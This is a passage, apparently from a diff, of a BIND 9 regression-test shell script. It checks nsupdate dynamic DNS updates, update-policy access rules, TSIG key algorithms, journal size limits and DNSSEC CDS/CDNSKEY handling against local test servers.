NSEC3PARAM > dig.out.ns3.$n || _ret=1 + if grep "ANSWER: 1," dig.out.ns3.$n > /dev/null; then + _ret=0 + break + fi + sleep 1 +done + +if [ $_ret -ne 0 ]; then ret=1; fi +grep "7200.*NSEC3PARAM 1 0 5 -" dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +$JOURNALPRINT ns3/nsec3param.test.db.signed.jnl > jp.out.ns3.$n +# intermediate TTL changes. +grep "add nsec3param.test. 7200 IN NSEC3PARAM 1 0 4 -" jp.out.ns3.$n > /dev/null || ret=1 +grep "add nsec3param.test. 7200 IN NSEC3PARAM 1 0 1 -" jp.out.ns3.$n > /dev/null || ret=1 +# delayed adds and deletes. +grep "add nsec3param.test. 0 IN TYPE65534 .# 6 000180000500" jp.out.ns3.$n > /dev/null || ret=1 +grep "add nsec3param.test. 0 IN TYPE65534 .# 6 000140000100" jp.out.ns3.$n > /dev/null || ret=1 +grep "add nsec3param.test. 0 IN TYPE65534 .# 6 000140000400" jp.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=$((ret + status)); fi + + +ret=0 +echo_i "testing that rndc stop updates the file" +$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated4.example.nil. 600 A 10.10.10.3 +send +END +sleep 3 +stop_server --use-rndc --port ${CONTROLPORT} ns1 +sleep 3 +# Removing the journal file and restarting the server means +# that the data served by the new server process are exactly +# those dumped to the file by "rndc stop". +rm -f ns1/*jnl +start_server --noclean --restart --port ${PORT} ns1 +for try in 0 1 2 3 4 5 6 7 8 9; do + iret=0 + $DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + updated4.example.nil. 
@10.53.0.1 a > dig.out.ns1 || iret=1 + digcomp knowngood.ns1.afterstop dig.out.ns1 || iret=1 + [ "$iret" -eq 0 ] && break + sleep 1 +done +[ "$iret" -ne 0 ] && ret=1 +[ "$ret" -eq 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "check that 'nsupdate -l' with a missing keyfile reports the missing file" +$NSUPDATE -4 -p ${PORT} -l -k ns1/nonexistent.key 2> nsupdate.out < /dev/null +grep ns1/nonexistent.key nsupdate.out > /dev/null || ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy local' works from localhost address ($n)" +$NSUPDATE -k ns5/session.key > nsupdate.out.$n 2>&1 << END || ret=1 +server 10.53.0.5 ${PORT} +local 127.0.0.1 +update add fromlocal.local.nil. 600 A 1.2.3.4 +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 && ret=1 +$DIG $DIGOPTS @10.53.0.5 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + fromlocal.local.nil. > dig.out.ns5.$n || ret=1 +grep fromlocal dig.out.ns5.$n > /dev/null 2>&1 || ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy local' fails from non-localhost address ($n)" +grep 'match on session key not from localhost' ns5/named.run > /dev/null && ret=1 +$NSUPDATE -k ns5/session.key > nsupdate.out.$n 2>&1 << END && ret=1 +server 10.53.0.5 ${PORT} +local 10.53.0.1 +update add nonlocal.local.nil. 600 A 4.3.2.1 +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 || ret=1 +grep 'match on session key not from localhost' ns5/named.run > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.5 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + nonlocal.local.nil. 
> dig.out.ns5.$n || ret=1 +grep nonlocal dig.out.ns5.$n > /dev/null 2>&1 && ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy tcp-self' refuses update of records via UDP ($n)" +$NSUPDATE > nsupdate.out.$n 2>&1 << END +server 10.53.0.6 ${PORT} +local 127.0.0.1 +update add 1.0.0.127.in-addr.arpa. 600 PTR localhost. +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 || ret=1 +$DIG $DIGOPTS @10.53.0.6 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + -x 127.0.0.1 > dig.out.ns6.$n +grep localhost. dig.out.ns6.$n > /dev/null 2>&1 && ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy tcp-self' permits update of records for the client's own address via TCP ($n)" +$NSUPDATE -v > nsupdate.out.$n 2>&1 << END || ret=1 +server 10.53.0.6 ${PORT} +local 127.0.0.1 +update add 1.0.0.127.in-addr.arpa. 600 PTR localhost. +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 && ret=1 +$DIG $DIGOPTS @10.53.0.6 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + -x 127.0.0.1 > dig.out.ns6.$n || ret=1 +grep localhost. dig.out.ns6.$n > /dev/null 2>&1 || ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy tcp-self' refuses update of records for a different address from the client's own address via TCP ($n)" +$NSUPDATE -v > nsupdate.out.$n 2>&1 << END +server 10.53.0.6 ${PORT} +local 127.0.0.1 +update add 1.0.168.192.in-addr.arpa. 600 PTR localhost. +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 || ret=1 +$DIG $DIGOPTS @10.53.0.6 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + -x 192.168.0.1 > dig.out.ns6.$n +grep localhost. 
dig.out.ns6.$n > /dev/null 2>&1 && ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy subdomain' is properly enforced ($n)" +# "restricted.example.nil" matches "grant ... subdomain restricted.example.nil" +# and thus this UPDATE should succeed. +$NSUPDATE -d <<END > nsupdate.out1-$n 2>&1 || ret=1 +server 10.53.0.1 ${PORT} +key restricted.example.nil 1234abcd8765 +update add restricted.example.nil 0 IN TXT everywhere. +send +END +$DIG $DIGOPTS +tcp @10.53.0.1 restricted.example.nil TXT > dig.out.1.test$n || ret=1 +grep "TXT.*everywhere" dig.out.1.test$n > /dev/null || ret=1 +# "example.nil" does not match "grant ... subdomain restricted.example.nil" and +# thus this UPDATE should fail. +$NSUPDATE -d <<END > nsupdate.out2-$n 2>&1 && ret=1 +server 10.53.0.1 ${PORT} +key restricted.example.nil 1234abcd8765 +update add example.nil 0 IN TXT everywhere. +send +END +$DIG $DIGOPTS +tcp @10.53.0.1 example.nil TXT > dig.out.2.test$n || ret=1 +grep "TXT.*everywhere" dig.out.2.test$n > /dev/null && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy zonesub' is properly enforced ($n)" +# grant zonesub-key.example.nil zonesub TXT; +# the A record update should be rejected as it is not in the type list +$NSUPDATE -d <<END > nsupdate.out1-$n 2>&1 && ret=1 +server 10.53.0.1 ${PORT} +key zonesub-key.example.nil 1234subk8765 +update add zonesub.example.nil 0 IN A 1.2.3.4 +send +END +$DIG $DIGOPTS +tcp @10.53.0.1 zonesub.example.nil A > dig.out.1.test$n || ret=1 +grep "status: REFUSED" nsupdate.out1-$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.1.test$n > /dev/null || ret=1 +# the TXT record update should be accepted as it is in the type list +$NSUPDATE -d <<END > nsupdate.out2-$n 2>&1 || ret=1 +server 10.53.0.1 ${PORT} +key zonesub-key.example.nil 1234subk8765 +update add zonesub.example.nil 0 IN TXT everywhere. 
+send
+END
+$DIG $DIGOPTS +tcp @10.53.0.1 zonesub.example.nil TXT > dig.out.2.test$n || ret=1
+grep "status: REFUSED" nsupdate.out2-$n > /dev/null && ret=1
+grep "ANSWER: 1," dig.out.2.test$n > /dev/null || ret=1
+grep "TXT.*everywhere" dig.out.2.test$n > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "check 'grant' in deny name + grant subdomain ($n)"
+$NSUPDATE << EOF > nsupdate.out-$n 2>&1 || ret=1
+key hmac-sha256:subkey 1234abcd8765
+server 10.53.0.9 ${PORT}
+zone denyname.example
+update add foo.denyname.example 3600 IN TXT added
+send
+EOF
+$DIG $DIGOPTS +tcp @10.53.0.9 foo.denyname.example TXT > dig.out.ns9.test$n
+grep "added" dig.out.ns9.test$n > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "check 'deny' in deny name + grant subdomain ($n)"
+$NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1
+key hmac-sha256:subkey 1234abcd8765
+server 10.53.0.9 ${PORT}
+zone denyname.example
+update add denyname.example 3600 IN TXT added
+send
+EOF
+$DIG $DIGOPTS +tcp @10.53.0.9 denyname.example TXT > dig.out.ns9.test$n
+grep "added" dig.out.ns9.test$n > /dev/null && ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "check that changes to the DNSKEY RRset TTL do not have side effects ($n)"
+$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd dnskey.test. \
+ @10.53.0.3 dnskey | \
+ awk -v port="${PORT}" 'BEGIN { print "server 10.53.0.3", port; }
+ $2 == 10 && $3 == "IN" && $4 == "DNSKEY" { $2 = 600; print "update add", $0 }
+ END { print "send" }' > update.in.$n
+$NSUPDATE update.in.$n
+
+$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd dnskey.test. \
+ @10.53.0.3 any > dig.out.ns3.$n
+
+grep "600.*DNSKEY" dig.out.ns3.$n > /dev/null || ret=1
+grep TYPE65534 dig.out.ns3.$n > /dev/null && ret=1
+if test $ret -ne 0
+then
+echo_i "failed"; status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "check notify with TSIG worked ($n)"
+# if the alternate view received a notify--meaning, the notify was
+# validly signed by "altkey"--then the zonefile update.alt.bk will
+# will have been created.
+[ -f ns2/update.alt.bk ] || ret=1
+if [ $ret -ne 0 ]; then
+ echo_i "failed"
+ status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "check type list options ($n)"
+$NSUPDATE -T > typelist.out.T.${n} || { ret=1; echo_i "nsupdate -T failed"; }
+$NSUPDATE -P > typelist.out.P.${n} || { ret=1; echo_i "nsupdate -P failed"; }
+$NSUPDATE -TP > typelist.out.TP.${n} || { ret=1; echo_i "nsupdate -TP failed"; }
+grep ANY typelist.out.T.${n} > /dev/null && { ret=1; echo_i "failed: ANY found (-T)"; }
+grep ANY typelist.out.P.${n} > /dev/null && { ret=1; echo_i "failed: ANY found (-P)"; }
+grep ANY typelist.out.TP.${n} > /dev/null && { ret=1; echo_i "failed: ANY found (-TP)"; }
+grep KEYDATA typelist.out.T.${n} > /dev/null && { ret=1; echo_i "failed: KEYDATA found (-T)"; }
+grep KEYDATA typelist.out.P.${n} > /dev/null && { ret=1; echo_i "failed: KEYDATA found (-P)"; }
+grep KEYDATA typelist.out.TP.${n} > /dev/null && { ret=1; echo_i "failed: KEYDATA found (-TP)"; }
+grep AAAA typelist.out.T.${n} > /dev/null || { ret=1; echo_i "failed: AAAA not found (-T)"; }
+grep AAAA typelist.out.P.${n} > /dev/null && { ret=1; echo_i "failed: AAAA found (-P)"; }
+grep AAAA typelist.out.TP.${n} > /dev/null || { ret=1; echo_i "failed: AAAA not found (-TP)"; }
+if [ $ret -ne 0 ]; then
+ echo_i "failed"
+ status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "check command list ($n)"
+(
+while read cmd
+do
+ echo "$cmd" | $NSUPDATE > /dev/null 2>&1
+ if test $? -gt 1 ; then
+ echo_i "failed ($cmd)"
+ ret=1
+ fi
+ echo "$cmd " | $NSUPDATE > /dev/null 2>&1
+ if test $? -gt 1 ; then
+ echo_i "failed ($cmd)"
+ ret=1
+ fi
+done
+exit $ret
+) < commandlist || ret=1
+if [ $ret -ne 0 ]; then
+ status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "check TSIG key algorithms (nsupdate -k) ($n)"
+if $FEATURETEST --md5
+then
+ ALGS="md5 sha1 sha224 sha256 sha384 sha512"
+else
+ ALGS="sha1 sha224 sha256 sha384 sha512"
+ echo_i "skipping disabled md5 algorithm"
+fi
+for alg in $ALGS; do
+ $NSUPDATE -k ns1/${alg}.key <<END > /dev/null || ret=1
+server 10.53.0.1 ${PORT}
+update add ${alg}.keytests.nil. 600 A 10.10.10.3
+send
+END
+done
+sleep 2
+for alg in $ALGS; do
+ $DIG $DIGOPTS +short @10.53.0.1 ${alg}.keytests.nil | grep 10.10.10.3 > /dev/null 2>&1 || ret=1
+done
+if [ $ret -ne 0 ]; then
+ echo_i "failed"
+ status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "check TSIG key algorithms (nsupdate -y) ($n)"
+for alg in md5 sha1 sha224 sha256 sha384 sha512; do
+ secret=$(sed -n 's/.*secret "\(.*\)";.*/\1/p' ns1/${alg}.key)
+ $NSUPDATE -y "hmac-${alg}:${alg}-key:$secret" <<END > /dev/null || ret=1
+server 10.53.0.1 ${PORT}
+update add ${alg}.keytests.nil. 600 A 10.10.10.50
+send
+END
+done
+sleep 2
+for alg in md5 sha1 sha224 sha256 sha384 sha512; do
+ $DIG $DIGOPTS +short @10.53.0.1 ${alg}.keytests.nil | grep 10.10.10.50 > /dev/null 2>&1 || ret=1
+done
+if [ $ret -ne 0 ]; then
+ echo_i "failed"
+ status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "check that ttl is capped by max-ttl ($n)"
+$NSUPDATE <<END > /dev/null || ret=1
+server 10.53.0.1 ${PORT}
+update add cap.max-ttl.nil. 600 A 10.10.10.3
+update add nocap.max-ttl.nil. 150 A 10.10.10.3
+send
+END
+sleep 2
+$DIG $DIGOPTS @10.53.0.1 cap.max-ttl.nil | grep "^cap.max-ttl.nil. 300" > /dev/null 2>&1 || ret=1
+$DIG $DIGOPTS @10.53.0.1 nocap.max-ttl.nil | grep "^nocap.max-ttl.nil. 150" > /dev/null 2>&1 || ret=1
+if [ $ret -ne 0 ]; then
+ echo_i "failed"
+ status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "add a record which is truncated when logged. ($n)"
+$NSUPDATE verylarge || ret=1
+$DIG $DIGOPTS +tcp @10.53.0.1 txt txt.update.nil > dig.out.ns1.test$n
+grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1
+grep "adding an RR at 'txt.update.nil' TXT .* \[TRUNCATED\]" ns1/named.run > /dev/null || ret=1
+if [ $ret -ne 0 ]; then
+ echo_i "failed"
+ status=1
+fi
+
+n=$((n + 1))
+ret=0
+echo_i "check that yyyymmddvv serial number is correctly generated ($n)"
+oldserial=$($DIG $DIGOPTS +short yyyymmddvv.nil. soa @10.53.0.1 | awk '{print $3}') || ret=1
+$NSUPDATE <<END > /dev/null 2>&1 || ret=1
+ server 10.53.0.1 ${PORT}
+ ttl 600
+ update add new.yyyymmddvv.nil in a 1.2.3.4
+ send
+END
+now=$($PERL -e '@lt=localtime(); printf "%.4d%0.2d%0.2d00\n",$lt[5]+1900,$lt[4]+1,$lt[3];')
+sleep 1
+serial=$($DIG $DIGOPTS +short yyyymmddvv.nil. soa @10.53.0.1 | awk '{print $3}') || ret=1
+[ "$oldserial" -ne "$serial" ] || ret=1
+[ "$serial" -eq "$now" ] || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+#
+# Refactor to use perl to launch the parallel updates.
+#
+if false
+then
+n=$((n + 1))
+echo_i "send many simultaneous updates via a update forwarder ($n)"
+ret=0
+for i in 0 1 2 3 4 5 6 7
+do
+(
+ for j in 0 1 2 3 4 5 6 7
+ do
+ (
+ $NSUPDATE << EOF
+server 10.53.0.3 ${PORT}
+zone many.test
+update add $i-$j.many.test 0 IN A 1.2.3.4
+send
+EOF
+ ) &
+ done
+ wait
+) &
+done
+wait
+dig axfr many.test @10.53.0.1 > dig.out.test$n
+lines=$(awk '$4 == "A" { l++ } END { print l }' dig.out.test$n)
+test ${lines:-0} -eq 64 || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+fi
+
+n=$((n + 1))
+echo_i "check max-journal-size limits ($n)"
+ret=0
+rm -f nsupdate.out1-$n
+# add one record
+$NSUPDATE << EOF >> nsupdate.out1-$n 2>&1
+server 10.53.0.1 ${PORT}
+zone maxjournal.test
+update add z.maxjournal.test 300 IN A 10.20.30.40
+send
+EOF
+for i in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do
+ # repeatedly add and remove the same set of records to fill up
+ # the journal file without changing the zone content
+ $NSUPDATE << EOF >> nsupdate.out1-$n 2>&1
+server 10.53.0.1 ${PORT}
+zone maxjournal.test
+update add a.maxjournal.test 300 IN A 1.2.3.4
+update add b.maxjournal.test 300 IN A 1.2.3.4
+update add c.maxjournal.test 300 IN A 1.2.3.4
+update add d.maxjournal.test 300 IN A 1.2.3.4
+send
+update del a.maxjournal.test
+update del b.maxjournal.test
+update del c.maxjournal.test
+update del d.maxjournal.test
+send
+EOF
+done
+# check that the journal is big enough to require truncation.
+size=$($PERL -e 'use File::stat; my $sb = stat(@ARGV[0]); printf("%s\n", $sb->size);' ns1/maxjournal.db.jnl)
+[ "$size" -gt 6000 ] || ret=1
+sleep 1
+$RNDCCMD 10.53.0.1 sync maxjournal.test
+check_size_lt_5000() (
+ size=$($PERL -e 'use File::stat; my $sb = stat(@ARGV[0]); printf("%s\n", $sb->size);' ns1/maxjournal.db.jnl)
+ [ "$size" -lt 5000 ]
+)
+retry_quiet 20 check_size_lt_5000 || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+echo_i "check check-names processing ($n)"
+ret=0
+$NSUPDATE << EOF > nsupdate.out1-$n 2>&1
+update add # 0 in a 1.2.3.4
+EOF
+grep "bad owner" nsupdate.out1-$n > /dev/null || ret=1
+
+$NSUPDATE << EOF > nsupdate.out2-$n 2>&1
+check-names off
+update add # 0 in a 1.2.3.4
+EOF
+grep "bad owner" nsupdate.out2-$n > /dev/null && ret=1
+
+$NSUPDATE << EOF > nsupdate.out3-$n 2>&1
+update add . 0 in mx 0 #
+EOF
+grep "bad name" nsupdate.out3-$n > /dev/null || ret=1
+
+$NSUPDATE << EOF > nsupdate.out4-$n 2>&1
+check-names off
+update add . 0 in mx 0 #
+EOF
+grep "bad name" nsupdate.out4-$n > /dev/null && ret=1
+
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+echo_i "check adding of delegating NS records processing ($n)"
+ret=0
+$NSUPDATE -v << EOF > nsupdate.out-$n 2>&1 || ret=1
+server 10.53.0.3 ${PORT}
+zone delegation.test.
+update add child.delegation.test. 3600 NS foo.example.net.
+update add child.delegation.test. 3600 NS bar.example.net.
+send
+EOF
+$DIG $DIGOPTS +tcp @10.53.0.3 ns child.delegation.test > dig.out.ns1.test$n
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1
+grep "AUTHORITY: 2" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+echo_i "check deleting of delegating NS records processing ($n)"
+ret=0
+$NSUPDATE -v << EOF > nsupdate.out-$n 2>&1 || ret=1
+server 10.53.0.3 ${PORT}
+zone delegation.test.
+update del child.delegation.test. 3600 NS foo.example.net.
+update del child.delegation.test. 3600 NS bar.example.net.
+send
+EOF
+$DIG $DIGOPTS +tcp @10.53.0.3 ns child.delegation.test > dig.out.ns1.test$n
+grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+echo_i "check that adding too many records is blocked ($n)"
+ret=0
+$NSUPDATE -v << EOF > nsupdate.out-$n 2>&1 && ret=1
+server 10.53.0.3 ${PORT}
+zone too-big.test.
+update add r1.too-big.test 3600 IN TXT r1.too-big.test
+send
+EOF
+grep "update failed: SERVFAIL" nsupdate.out-$n > /dev/null || ret=1
+$DIG $DIGOPTS +tcp @10.53.0.3 r1.too-big.test TXT > dig.out.ns3.test$n
+grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1
+grep "records in zone (4) exceeds max-records (3)" ns3/named.run > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "check whether valid addresses are used for primary failover ($n)"
+$NSUPDATE -t 1 <<END > nsupdate.out-$n 2>&1 && ret=1
+server 10.53.0.4 ${PORT}
+zone unreachable.
+update add unreachable. 600 A 192.0.2.1
+send
+END
+grep "; Communication with 10.53.0.4#${PORT} failed: timed out" nsupdate.out-$n > /dev/null 2>&1 || ret=1
+grep "not implemented" nsupdate.out-$n > /dev/null 2>&1 && ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "ensure bad owner name is fatal in non-interactive mode ($n)"
+$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1
+ update add emptylabel..nil. 600 A 10.10.10.1
+END
+grep "invalid owner name: empty label" nsupdate.out > /dev/null || ret=1
+grep "syntax error" nsupdate.out > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "ensure bad owner name is not fatal in interactive mode ($n)"
+$NSUPDATE -i <<END > nsupdate.out 2>&1 || ret=1
+ update add emptylabel..nil. 600 A 10.10.10.1
+END
+grep "invalid owner name: empty label" nsupdate.out > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "ensure invalid key type is fatal in non-interactive mode ($n)"
+$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1
+ key badkeytype:example abcd12345678
+END
+grep "unknown key type 'badkeytype'" nsupdate.out > /dev/null || ret=1
+grep "syntax error" nsupdate.out > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "ensure invalid key type is not fatal in interactive mode ($n)"
+$NSUPDATE -i <<END > nsupdate.out 2>&1 || ret=1
+ key badkeytype:example abcd12345678
+END
+grep "unknown key type 'badkeytype'" nsupdate.out > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "ensure unresolvable server name is fatal in non-interactive mode ($n)"
+$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1
+ server unresolvable..
+END
+grep "couldn't get address for 'unresolvable..':" nsupdate.out > /dev/null || ret=1
+grep "syntax error" nsupdate.out > /dev/null || ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "ensure unresolvable server name is not fatal in interactive mode ($n)"
+$NSUPDATE -i <<END > nsupdate.out 2>&1 || ret=1
+ server unresolvable..
+END
+grep "couldn't get address for 'unresolvable..':" nsupdate.out > /dev/null || ret=1
+grep "syntax error" nsupdate.out > /dev/null && ret=1
+[ $ret = 0 ] || { echo_i "failed"; status=1; }
+
+n=$((n + 1))
+ret=0
+echo_i "check nsupdate -4 -6 ($n)"
+$NSUPDATE -4 -6 <<END > nsupdate.out-$n 2>&1 && ret=1
+server 10.53.0.3 ${PORT}
+zone delegation.test.
+update del child.delegation.test. 3600 NS foo.example.net.
+update del child.delegation.test. 3600 NS bar.example.net.
+send +END +grep "only one of -4 and -6 allowed" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check nsupdate -4 with an IPv6 server address ($n)" +$NSUPDATE -4 <<END > nsupdate.out-$n 2>&1 && ret=1 +server fd92:7065:b8e:ffff::2 ${PORT} +zone delegation.test. +update del child.delegation.test. 3600 NS foo.example.net. +update del child.delegation.test. 3600 NS bar.example.net. +send +END +grep "address family not supported" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that TKEY in a update is rejected ($n)" +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +update add tkey.example 0 in tkey invalid.algorithm. 1516055980 1516140801 1 0 16 gRof8D2BFKvl/vrr9Lmnjw== 16 gRof8D2BFKvl/vrr9Lmnjw== +send +END +grep "UPDATE, status: NOERROR" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +grep "UPDATE, status: FORMERR" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that DS to the zone apex is ignored ($n)" +$DIG $DIGOPTS +tcp +norec example DS @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +nextpart ns3/named.run > /dev/null +# specify zone to override the default of adding to parent zone +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 ${PORT} +zone example +update add example 0 in DS 14364 10 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C +send +END +msg=": attempt to add a DS record at zone apex ignored" +nextpart ns3/named.run | grep "$msg" > /dev/null || ret=1 +$DIG $DIGOPTS +tcp +norec example DS @10.53.0.3 > dig.out.post.test$n || ret=1 +grep "status: NOERROR" dig.out.post.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.post.test$n > /dev/null || 
ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDS with mismatched algorithm to DNSSEC multisigner zone is not allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDS @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDS 14364 14 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C +send +END +msg=": bad CDS RRset" +nextpart ns3/named.run | grep "$msg" > /dev/null || ret=1 +$DIG $DIGOPTS +tcp +norec multisigner.test CDS @10.53.0.3 > dig.out.post.test$n || ret=1 +grep "status: NOERROR" dig.out.post.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.post.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDNSKEY with mismatched algorithm to DNSSEC multisigner zone is not allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDNSKEY @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +nextpart ns3/named.run > /dev/null +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDNSKEY 257 3 14 d0NQ5PKmDz6P0B1WPMH9/UKRux/toSFwV2nTJYPA1Cx8pB0sJGTXbVhG U+6gye7VCHDhGIn9CjVfb2RJPW7GnQ== +send +END +msg=": bad CDNSKEY RRset" +nextpart ns3/named.run | grep "$msg" > /dev/null || ret=1 +$DIG $DIGOPTS +tcp +norec multisigner.test CDNSKEY @10.53.0.3 > dig.out.post.test$n || ret=1 +grep "status: NOERROR" dig.out.post.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.post.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDS to 
DNSSEC multisigner zone is allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDS @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 ${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDS 14364 13 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C +send +END +retry_quiet 5 has_positive_response multisigner.test CDS 10.53.0.3 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDNSKEY to DNSSEC multisigner zone is allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDNSKEY @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 